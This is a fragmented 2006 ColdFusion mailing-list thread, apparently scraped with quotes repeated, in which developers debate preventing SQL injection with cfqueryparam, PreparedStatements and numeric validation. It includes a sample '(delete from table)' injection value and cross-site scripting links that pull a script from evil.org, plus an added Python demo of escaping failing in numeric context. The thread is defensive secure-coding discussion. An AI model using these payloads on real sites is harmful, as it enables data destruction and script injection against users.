Objects stored in a repository are very much an Object Oriented DB concept.
CF doesn't really support this idea of storing an object. Most of this is
accomplished by storing data in an RDBMS.
Centralizing where you update metadata for queries is very much like ORM
models. An example would be
Mark,
We all have time frames and I was just offering a suggestion that has saved
me time with other clients.
I wish you success on your endeavor.
Teddy
~|
Introducing the Fusion Authority Quarterly Update. 80 pages of
://www.reedexpo.com
-Original Message-
From: Dan Plesse
To: CF-Talk
Sent: Fri Aug 25 20:08:18 2006
Subject: Re: coldfusion sql injection
One of the things I am thinking about doing today is running an outside process
(hsqldb web server started by CF using cfexecute) which contains all my
objects which
I think I am going to try an object repository using the (under used)
coldfusion JWS service.
I think I did this before but I have no idea why I dropped the idea it's so
simple to do.
JWS example
import org.hsqldb.WebServer;
import java.io.*;
public class MyWebserverObject extends WebServer {
    // The class body was not included in the post; this minimal body
    // just starts the HSQLDB web server (start() is inherited from org.hsqldb.Server)
    public static void main(String[] args) {
        new MyWebserverObject().start();
    }
}
On 8/25/06, Robertson-Ravo, Neil (RX) [EMAIL PROTECTED]
wrote:
No the question was not ColdFusion, the question was why re-invent the
wheel
- just use cfquery and cfqueryparam.
Re-inventing the wheel is relative to what you're doing and the frame of
reference.
I can think of many reasons
So there's the question. Can someone provide an example of a
working sql injection attack?
Sure:
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
There's a whole section in there about multi-step SQL injection attacks
against systems that escape all single quotes. They are
I will pipe up here, and ask one question though. And the
reason I ask this is that it's maybe different for me, but I
tend not to use the cfqueryparam in cffunctions that have
cfarguments and are typed.
I find it is not required as the function will throw an error
anyway, and the
On 8/24/06, Dave Watts [EMAIL PROTECTED] wrote:
More evil is stuff like:
<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT
SRC='http://evil.org/badkama.js' ...
I don't know what you mean by more evil, but generally speaking SQL
injection attacks are considered to be a more serious
I have a good example of injection and XSS here...
http://mkruger.cfwebtools.com/index.cfm?mode=alias&alias=security.pyramid.code
-Original Message-
So there's the question. Can someone provide an example of a
working sql injection attack?
I will pipe up here, and ask one question though. And the reason I ask this
is that it's maybe different for me, but I tend not to use the cfqueryparam
in cffunctions that have cfarguments and are typed.
I find it is not required as the function will throw an error anyway, and
the only time
My example using PrepareStatements.
This makes a sql injection attack a thing of the past and it's also faster.
// Parameter markers (?) are bound separately; the values are never parsed as SQL
PreparedStatement ps = con.prepareStatement("INSERT INTO MYTABLE VALUES (?,?,?,?)");
ps.setInt(1, 3);
ps.setString(2, "something");
ps.setString(3, "and");
ps.setString(4, "other");
ps.executeUpdate();
-Original Message-
From: Dan Plesse
To: CF-Talk
Sent: Fri Aug 25 17:47:24 2006
Subject: Re: coldfusion sql injection
My example using PrepareStatements.
This makes a sql injection attack a thing of the past and it's also faster.
PreparedStatement ps = con.PrepareStatement
My example using PrepareStatements.
This makes a sql injection attack a thing of the past and
it's also faster.
While you might have perfectly valid reasons for doing this, it is what
CFQUERYPARAM does for you, if you're using CFQUERY. If I wanted to write all
my database connection stuff in
. Doing it the
way described below ... I might as well use ASP :)
-Mark
-Original Message-
From: Dave Watts [mailto:[EMAIL PROTECTED]
Sent: Friday, August 25, 2006 12:08 PM
To: CF-Talk
Subject: RE: coldfusion sql injection
My example using PrepareStatements.
This makes a sql injection
If you spend that much time maintaining queries, perhaps you need to
organize the queries into an ORM model and alleviate some routine tasks.
Teddy
-Original Message-
From: Dan Plesse
To: CF-Talk
Sent: Fri Aug 25 17:47:24 2006
Subject: Re: coldfusion sql injection
My example
One of the things I am thinking about doing today is running an outside process
(hsqldb web server started by CF using cfexecute) which contains all my
objects which coldfusion uses like all my PrepareStatements and cfquery
objects. I wanted to use objects which were saved in a DB now this is my
More evil is stuff like:
<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT
SRC='http://evil.org/badkama.js'></SCRIPT>">Go to trusted.org</A>
OR
<img src="http://trusted.org/account.asp?ak=<script>
document.location.replace
More evil is stuff like:
<A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT
SRC='http://evil.org/badkama.js' ...
I don't know what you mean by more evil, but generally speaking SQL
injection attacks are considered to be a more serious problem than
cross-site scripting attacks. Fortunately,
This has been necessary for ages and I'm glad they finally added it
(not that I've used a DW code gen wizard for anything, apart from the
IE ActiveX activation thing, in years).
On 8/25/06, Dave Watts [EMAIL PROTECTED] wrote:
Even the Dreamweaver 8 code-generation
wizards generate
I will pipe up here, and ask one question though. And the reason I ask this
is that it's maybe different for me, but I tend not to use the cfqueryparam
in cffunctions that have cfarguments and are typed.
I find it is not required as the function will throw an error anyway, and
the only time that
CFQUERYPARAM binds the argument into the statement, preventing it from
being interpreted as SQL.
On 8/25/06, Andrew Scott [EMAIL PROTECTED] wrote:
I will pipe up here, and ask one question though. And the reason I ask this
is that it's maybe different for me, but I tend not to use the
Russ wrote:
That's the thing... When is cfqueryparam REALLY necessary for security? I
want to see some examples that require cfqueryparam.
Always. For the simple reason that you are not able to prove that any other
solution is secure.
Jochem
Message-
From: Jochem van Dieten
To: CF-Talk
Sent: Wed Aug 23 09:10:26 2006
Subject: Re: coldfusion sql injection
Russ wrote:
That's the thing... When is cfqueryparam REALLY necessary for security? I
want to see some examples that require cfqueryparam.
Always. For the simple reason that you
Rick Root wrote:
Snake wrote:
Select * from table
Where x = #form.value#
And form.value = (delete from table)
<cftry>
<cfparam name="form.value" type="numeric">
<cfcatch type="any"><cfthrow ...></cfcatch>
</cftry>
or
<cfif not isNumeric(form.value)>
<cfthrow ...>
</cfif>
And that catches
Let alone the security aspect, it also improves performance by causing your
database server to bind the variables before executing the query.
Straight from Macromedia:
http://tinyurl.com/oo49m (link to docs)
- Allows the use of SQL bind parameters, which improves performance.
- Ensures that
The string is also autoescaped even if you don't use cfqueryparam... at
least on SQL server. Is it not with other DB systems?
-Original Message-
From: Jeff Guillaume [mailto:[EMAIL PROTECTED]
Sent: Wednesday, August 23, 2006 10:19 AM
To: CF-Talk
Subject: Re: coldfusion sql
The string is also autoescaped even if you don't use cfqueryparam... at
least on SQL server. Is it not with other DB systems?
Autoescape is done by CF, so it works for any DB.
--
___
REUSE CODE! Use custom tags;
See
Russ wrote:
The string is also autoescaped even if you don't use cfqueryparam... at
least on SQL server. Is it not with other DB systems?
It is. But that is not enough.
Jochem
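The point behind Snake's numeric example and Jochem's "It is. But that is not enough.", worked through as an added example that is not from the thread. It uses Python's sqlite3 module instead of CFML so it runs offline; the table t with column x, its three rows, and the function names are constructed for the illustration. SQLite will not run a DELETE as a subquery, so the numeric-context payload is "2 OR 1=1" rather than Snake's "(delete from table)"; the mechanism is the same (no quote is needed, so quote escaping changes nothing), and the bound-parameter function plays the role of cfqueryparam or Dan's PreparedStatement:

```python
"""Added example (not code from the CF-Talk thread): quote escaping protects a
string context but not a numeric one; bind parameters and type validation do."""
import sqlite3


def make_db():
    """Constructed sample table standing in for Snake's 'table' with column x."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t (x INTEGER, name TEXT)")
    conn.executemany("INSERT INTO t VALUES (?, ?)",
                     [(1, "alice"), (2, "bob"), (3, "carol")])
    conn.commit()
    return conn


def escape_quotes(value):
    """What 'autoescaping' amounts to: double every single quote in the value."""
    return value.replace("'", "''")


def lookup_by_name_escaped(conn, form_value):
    """String context: quotes escaped, then interpolated into the SQL text.
    A quote-based payload stays inside the literal, which is what the thread
    means by 'injection into a string is not possible'."""
    sql = "SELECT x, name FROM t WHERE name = '%s'" % escape_quotes(form_value)
    return conn.execute(sql).fetchall()


def lookup_by_x_escaped(conn, form_value):
    """Numeric context, same escaping: #form.value# needs no quote to alter
    the statement, so the escaping achieves nothing here."""
    sql = "SELECT x, name FROM t WHERE x = %s" % escape_quotes(form_value)
    return conn.execute(sql).fetchall()


def lookup_by_x_bound(conn, form_value):
    """Bind parameter (the cfqueryparam / PreparedStatement equivalent): the
    value travels separately from the SQL text and is only ever compared,
    never parsed. A non-numeric value simply matches nothing."""
    sql = "SELECT x, name FROM t WHERE x = ?"
    return conn.execute(sql, (form_value,)).fetchall()


def is_numeric(form_value):
    """Mirror of isNumeric() / cfparam type="numeric" for an integer column."""
    try:
        int(form_value)
        return True
    except ValueError:
        return False


def lookup_by_x_validated(conn, form_value):
    """The other route proposed in the thread (Val(), isNumeric(), typed
    cfarguments): reject the request before it reaches the database."""
    if not is_numeric(form_value):
        raise ValueError("form.value is not numeric: %r" % form_value)
    return conn.execute("SELECT x, name FROM t WHERE x = %d" % int(form_value)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("string context, escaped :", lookup_by_name_escaped(db, "' OR '1'='1"))
    print("numeric context, escaped:", lookup_by_x_escaped(db, "2 OR 1=1"))
    print("numeric context, bound  :", lookup_by_x_bound(db, "2 OR 1=1"))
    print("numeric, validated      :", is_numeric("2 OR 1=1"))
```

Running it shows the escaped string lookup returning no rows for the quote payload, the escaped numeric lookup returning the whole table for "2 OR 1=1", and the bound version returning nothing for the same input while still finding row 2 for a plain "2".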
So there's the question. Can someone provide an example of a working sql
injection attack?
-Original Message-
From: Jochem van Dieten [mailto:[EMAIL PROTECTED]
Sent: Wednesday, August 23, 2006 2:05 PM
To: CF-Talk
Subject: Re: coldfusion sql injection
Russ wrote:
The string
I posted one earlier. Replace a numeric value that is sent via form or URL
with some SQL and the SQL will execute.
Snake
-Original Message-
From: Russ [mailto:[EMAIL PROTECTED]
Sent: 23 August 2006 19:16
To: CF-Talk
Subject: RE: coldfusion sql injection
So there's the question. Can
Russ wrote:
So there's the question. Can someone provide an example of a working sql
injection attack?
Plenty have been posted in this thread. Even more are in the archives. And if
that isn't enough, check the archives of the SecurityFocus penetration-testing
mailing list.
Jochem
I precompile everything. No DSN needed and since cfquery is serializable I
make a unique backup copy of tables for fun.
Example application.cfm
<cfif NOT isDefined("application.sqlserver_connection") OR
application.sqlserver_connection.isClosed() EQ "YES">
<cfset application.insert_mailiglist =
I just make sure I always scrub user-entered data when possible, but at the
very least you should use cfqueryparam to pass data into queries.
---
Jeff Guillaume
Kazoomis
www.kazoomis.com
Now, it is my belief that CF auto escapes single quotes, so sql injection
into a string is not possible. I
That's the thing... When is cfqueryparam REALLY necessary for security? I
want to see some examples that require cfqueryparam.
Russ
-Original Message-
From: Jeff Guillaume [mailto:[EMAIL PROTECTED]
Sent: Tuesday, August 22, 2006 6:53 PM
To: CF-Talk
Subject: Re: coldfusion sql
Snake wrote:
Select * from table
Where x = #form.value#
And form.value = (delete from table)
<cftry>
<cfparam name="form.value" type="numeric">
<cfcatch type="any"><cfthrow ...></cfcatch>
</cftry>
or
<cfif not isNumeric(form.value)>
<cfthrow ...>
</cfif>
cfqueryparam is *NEVER* required if you're
a reason that we NEED to use cfqueryparam for security.
Russ
-Original Message-
From: Snake [mailto:[EMAIL PROTECTED]
Sent: Tuesday, August 22, 2006 8:13 PM
To: CF-Talk
Subject: RE: coldfusion sql injection
Select * from table
Where x = #form.value#
And form.value = (delete
Well, we don't NEED to use CF to write web apps either, but it makes
my job a lot easier.
On 8/23/06, Russ [EMAIL PROTECTED] wrote:
Where x is numeric... which can be fixed by using a lot of other things
other than cfqueryparam, such as
Select * from table
Where x = #Val(form.value)#
Or